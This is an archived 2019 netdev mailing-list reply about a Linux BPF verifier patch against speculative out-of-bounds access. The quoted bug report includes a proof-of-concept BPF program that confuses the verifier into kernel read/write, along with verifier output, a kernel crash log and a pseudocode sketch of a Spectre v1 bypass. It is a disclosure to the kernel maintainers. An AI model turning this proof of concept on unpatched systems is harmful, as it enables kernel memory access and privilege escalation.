lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 4 Jan 2019 00:22:49 +0100 From: Daniel Borkmann <daniel@...earbox.net> To: Jann Horn <jannh@...gle.com> Cc: Alexei Starovoitov <ast@...nel.org>, "David S. Miller" <davem@...emloft.net>, jakub.kicinski@...ronome.com, Network Development <netdev@...r.kernel.org> Subject: Re: [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on pointer arithmetic Hi Jann, On 01/03/2019 10:13 PM, Jann Horn wrote: > Hi! > > Sorry about the extremely slow reply, I was on vacation over the > holidays and only got back today. > > On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@...earbox.net> wrote: >> Jann reported that the original commit back in b2157399cc98 >> ("bpf: prevent out-of-bounds speculation") was not sufficient >> to stop CPU from speculating out of bounds memory access: >> While b2157399cc98 only focussed on masking array map access >> for unprivileged users for tail calls and data access such >> that the user provided index gets sanitized from BPF program >> and syscall side, there is still a more generic form affected >> from BPF programs that applies to most maps that hold user >> data in relation to dynamic map access when dealing with >> unknown scalars or "slow" known scalars as access offset, for >> example: > [...] >> +static int sanitize_ptr_alu(struct bpf_verifier_env *env, >> + struct bpf_insn *insn, >> + const struct bpf_reg_state *ptr_reg, >> + struct bpf_reg_state *dst_reg, >> + bool off_is_neg) >> +{ > [...] >> + >> + /* If we arrived here from different branches with different >> + * limits to sanitize, then this won't work. >> + */ >> + if (aux->alu_state && >> + (aux->alu_state != alu_state || >> + aux->alu_limit != alu_limit)) >> + return -EACCES; > > This code path doesn't get triggered in the case where the same > ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg > += reg". This leads to kernel read/write because the code intended to > ensure safety of the "ptr += reg" case in speculative execution ends > up clobbering the addend in the "numeric_reg += reg" case: > > source code: > ============= > int main(void) { > int my_map = array_create(8, 30); > array_set(my_map, 0, 1); > struct bpf_insn insns[] = { > // load map value pointer into r0 and r2 > BPF_LD_MAP_FD(BPF_REG_ARG1, my_map), > BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), > BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16), > BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0), > BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), > BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), > BPF_EXIT_INSN(), > > // load some number from the map into r1 > BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0), > > // depending on R1, branch: > BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3), > > // branch A > BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), > BPF_MOV64_IMM(BPF_REG_3, 0), > BPF_JMP_A(2), > > // branch B > BPF_MOV64_IMM(BPF_REG_2, 0), > BPF_MOV64_IMM(BPF_REG_3, 0x100000), > > // *** COMMON INSTRUCTION *** > BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3), > > // depending on R1, branch: > BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1), > > // branch A > BPF_JMP_A(4), > > // branch B > BPF_MOV64_IMM(BPF_REG_0, 0x13371337), > // verifier-confused branch: verifier follows fall-through, > runtime follows jump > BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2), > BPF_MOV64_IMM(BPF_REG_0, 0), > BPF_EXIT_INSN(), > > // fake-dead code; targeted from branch A to prevent dead code sanitization > BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0), > BPF_MOV64_IMM(BPF_REG_0, 0), > BPF_EXIT_INSN() > }; > int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns)); > trigger_proc(sock_fd); > } > ============= > > verifier output: > ============= > 0: (18) r1 = 0x0 > 2: (bf) r2 = r10 > 3: (07) r2 += -16 > 4: (7a) *(u64 *)(r10 -16) = 0 > 5: (85) call bpf_map_lookup_elem#1 > 6: (55) if r0 != 0x0 goto pc+1 > R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm > 7: (95) exit > > from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 > fp-16=mmmmmmmm > 8: (71) r1 = *(u8 *)(r0 +0) > R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm > 9: (55) if r1 != 0x0 goto pc+3 > R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm > 10: (bf) r2 = r0 > 11: (b7) r3 = 0 > 12: (05) goto pc+2 > 15: (0f) r2 += r3 > R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 > R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1 > fp-16=mmmmmmmm > 16: (55) if r1 != 0x0 goto pc+1 > 17: (05) goto pc+4 > 22: (71) r0 = *(u8 *)(r0 +0) > R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 > R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1 > fp-16=mmmmmmmm > 23: (b7) r0 = 0 > 24: (95) exit > > from 15 to 16 (speculative execution): safe > > from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) > R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1 > fp-16=mmmmmmmm > 13: (b7) r2 = 0 > 14: (b7) r3 = 1048576 > 15: (0f) r2 += r3 > 16: (55) if r1 != 0x0 goto pc+1 > R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576 > R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm > 17: (05) goto pc+4 > 22: safe > > from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) > R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576 > R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm > 18: (b7) r0 = 322376503 > 19: (55) if r2 != 0x100000 goto pc+2 > 20: (b7) r0 = 0 > 21: (95) exit > processed 29 insns (limit 131072), stack depth 16 > ============= > > dmesg: > ============= > [ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164 > from=test pid=2185 > [ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48 > 83 ed 28 48 > [ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c > 89 7d 18 31 > [ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81 > 88 ff ff 48 > [ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00 > 00 00 48 81 > [ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e > 73 0c 83 e0 > [ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0 > 48 83 f8 00 > [ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b > 75 10 4c 8b > [ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78 > 00 48 83 ff > [ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6 > ba 00 00 10 > [ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09 > d2 49 f7 da > [ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 > ff 00 75 02 > [ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00 > 10 00 75 04 > [ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95 > [ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337 > [ 9948.481562] #PF error: [normal kernel read fault] > [ 9948.483878] PGD 0 P4D 0 > [ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN > [ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225 > [ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), > BIOS 1.10.2-1 04/01/2014 > [ 9948.494912] RIP: 0010:0xffffffffc01602f3 > [ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6 > 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31 > c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc > cc cc > [ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287 > [ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848 > [ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001 > [ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002 > [ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000 > [ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000 > [ 9948.525840] FS: 00007f2ad28ad700(0000) GS:ffff8881eb140000(0000) > knlGS:0000000000000000 > [ 9948.529708] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 > [ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0 > [ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 > [ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 > [ 9948.542581] Call Trace: > [ 9948.543760] ? sk_filter_trim_cap+0x148/0x2d0 > [ 9948.545847] ? sk_reuseport_is_valid_access+0xa0/0xa0 > [ 9948.548249] ? skb_copy_datagram_from_iter+0x6e/0x280 > [ 9948.550655] ? _raw_spin_unlock+0x16/0x30 > [ 9948.552581] ? deactivate_slab.isra.68+0x59d/0x600 > [ 9948.554866] ? unix_scm_to_skb+0xd1/0x230 > [ 9948.556780] ? unix_dgram_sendmsg+0x312/0x940 > [ 9948.558856] ? unix_stream_connect+0x980/0x980 > [ 9948.560986] ? aa_sk_perm+0x10c/0x3f0 > [ 9948.563123] ? kasan_unpoison_shadow+0x35/0x40 > [ 9948.565107] ? aa_af_perm+0x1e0/0x1e0 > [ 9948.566608] ? kasan_unpoison_shadow+0x35/0x40 > [ 9948.568463] ? unix_stream_connect+0x980/0x980 > [ 9948.570397] ? sock_sendmsg+0x6d/0x80 > [ 9948.571948] ? sock_write_iter+0x121/0x1c0 > [ 9948.573678] ? sock_sendmsg+0x80/0x80 > [ 9948.575258] ? sock_enable_timestamp+0x60/0x60 > [ 9948.576958] ? iov_iter_init+0x86/0xc0 > [ 9948.578395] ? __vfs_write+0x294/0x3b0 > [ 9948.579782] ? kernel_read+0xa0/0xa0 > [ 9948.581152] ? apparmor_task_setrlimit+0x330/0x330 > [ 9948.582919] ? vfs_write+0xe7/0x230 > [ 9948.584228] ? ksys_write+0xa1/0x120 > [ 9948.585559] ? __ia32_sys_read+0x50/0x50 > [ 9948.587174] ? do_syscall_64+0x73/0x160 > [ 9948.588872] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 > [ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq > [ 9948.593654] CR2: 0000000013371337 > [ 9948.595078] ---[ end trace cea5ab7027131bf2 ]--- > ============= Good point, thanks for catching this scenario! I'll get this fixed in order to reject such programs. > Aside from that, I also think that the pruning of "dead code" probably > still permits v1 speculative execution attacks when code vaguely like > the following is encountered, if it is possible to convince the CPU to > mispredict the second branch, but I haven't tested that so far: > > R0 = <slow map value, known to be 0>; > R1 = <fast map value>; > if (R1 != R0) { // mispredicted > return 0; > } > R3 = <a map value pointer>; > R2 = <arbitrary 64-bit number>; > if (R1 == 0) { // architecturally always taken, verifier prunes other branch > R2 = <a map value pointer>; > } > access R3[R2[0] & 1]; > > To convince the CPU to predict the second branch the way you want, you > could probably add another code path that jumps in front of the branch > with both R2 and R3 already containing valid pointers. Something like > this: > > if (<some map value>) { > R0 = <slow map value, known to be 0>; > R1 = <fast map value>; > if (R1 != R0) { // mispredicted > return 0; > } > R3 = <a map value pointer>; > R2 = <arbitrary 64-bit number>;} else { R3 = <a map value pointer>; > R2 = <arbitrary 64-bit number>; R1 = 1;} > if (R1 == 0) { // architecturally always taken, verifier prunes other branch > R2 = <a map value pointer>; > } > access R3[R2[0] & 1]; Thanks, I'll look into evaluating this case as well after the fix. Best, Daniel
Powered by blists - more mailing lists